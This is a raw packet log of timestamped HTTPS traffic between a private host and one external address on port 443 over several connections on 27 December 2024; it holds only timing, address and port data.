                                                        Dec 27, 2024 08:47:40.557218075 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.557287931 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.561482906 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.561552048 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.565979958 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.566051006 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.570338011 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.570416927 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.588615894 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.588694096 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.594048977 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.594122887 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.598448992 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.598517895 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.623394012 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.623469114 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.729372978 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.729466915 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.734437943 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.734507084 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.738354921 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.738424063 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.742528915 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.742610931 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.746267080 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.746342897 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.751404047 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.751471043 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.755337954 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.755439997 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.759321928 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.759388924 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.764436007 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.764523029 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.768377066 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.768469095 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.772331953 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.772437096 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.777206898 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.777271986 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.798554897 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.798643112 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.801723003 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.801784992 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.806826115 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.806906939 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.832850933 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.832961082 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.939780951 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.939909935 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.942773104 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.943072081 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.946490049 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.946571112 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.947652102 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.947738886 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.948170900 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.950318098 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.950346947 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:44.644936085 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:44.644980907 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:44.645066023 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:44.655927896 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:44.655956030 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.111684084 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.111788034 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.113604069 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.113624096 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.114001036 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.121391058 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.163328886 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.673475981 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.673532009 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.673619986 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.673638105 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.728364944 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.771799088 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.771815062 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.771893978 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.874396086 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.874418974 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.874500036 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.894160986 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.894172907 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.894315958 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.918626070 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.918749094 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.972937107 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.973059893 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.061558962 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.061666965 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.078490973 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.078578949 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.091078043 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.091173887 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.103660107 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.103765011 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.115972996 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.116072893 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.125252962 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.125374079 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.134522915 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.134648085 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.184537888 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.184619904 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.262042046 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.262130976 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.271907091 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.272016048 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.279247999 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.279335022 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.286583900 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.286672115 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.296484947 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.296596050 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.303865910 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.304012060 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.309823990 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.309907913 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.315021038 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.315107107 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.321840048 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.321912050 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.344552994 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.344731092 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.351346970 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.351444960 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.393831015 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.393965006 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.399102926 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.399204969 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.518332958 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.518435001 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.522013903 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.522105932 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.525815010 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.525937080 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.529437065 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.529515028 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.534233093 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.534354925 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.537966967 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.538103104 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.541745901 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.541825056 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.546478033 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.546554089 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.550234079 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.550340891 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.554341078 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.554440022 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.558013916 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.558104038 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.561769962 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.561876059 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.596026897 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.596126080 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.599750996 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.599826097 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.613951921 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.614109039 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.618840933 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.618984938 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.720335007 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.720428944 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.724961042 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.725035906 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.728634119 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.728704929 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.732275963 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.732356071 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.737098932 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.737282038 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.740878105 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.740948915 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.744596958 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.744674921 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.748197079 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.748275995 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.753089905 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.753180981 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.756674051 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.756752014 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.208496094 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.208849907 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.215037107 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.215142965 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.221805096 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.221940041 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.228363991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.228446007 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.237126112 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.237287045 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.243870020 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.244052887 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.250608921 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.250725031 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.259264946 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.259382010 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.265841007 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.265925884 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.272633076 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.272747993 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.329138041 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.329215050 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.335728884 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.335830927 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.342348099 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.342432022 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.350838900 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.350910902 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.356863022 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.356935024 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.362772942 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.362840891 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.397883892 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.398010969 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.402616024 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.402736902 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.407244921 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.407354116 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.413513899 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.413594007 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.418085098 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.418252945 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.422847033 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.422990084 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.427491903 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.427598953 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.433662891 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.433752060 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.438380957 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.438457012 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.443053961 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.443155050 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.486125946 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.486305952 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.489821911 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.489923954 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.493540049 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.493730068 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.497154951 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.497303963 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.501935005 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.502011061 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.505553007 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.505709887 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.590575933 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.590737104 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.593297005 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.593374014 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.597640991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.597707987 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.600955009 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.601056099 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.604434967 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.604531050 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.608753920 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.608887911 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.612071037 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.612157106 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.615581989 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.615689993 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.618777037 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.618978024 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.622642994 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.622744083 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.676431894 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.676593065 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.679339886 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.679493904 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.682075977 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.682173014 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.685926914 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.686062098 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.688570023 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.688673019 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.691509008 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.691618919 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.781400919 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.781497002 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.784112930 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.784260035 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.787020922 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.787117004 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.789807081 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.789906979 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.793464899 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.793567896 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.796273947 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.796370983 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.799151897 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.799268007 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.802789927 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.802875042 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.805573940 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.805665970 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.808595896 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.808803082 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.868144035 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.868263006 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.870198011 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.870285034 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.872960091 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.873068094 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.876589060 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.876858950 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.879527092 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.879636049 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.882283926 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.882359028 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.885983944 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.886123896 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.975483894 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.975567102 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.978235006 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.978312016 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.981113911 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.981175900 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.983956099 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.984057903 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.987612963 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.987736940 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.990398884 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.990542889 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.993304968 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.993532896 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.996951103 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.997009993 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:52.999804974 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:52.999882936 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.002676964 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.002857924 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.061474085 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.061650991 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.064208984 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.064285994 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.067151070 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:53.067219973 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:53.070776939 CET44349741150.241.97.10192.168.2.10
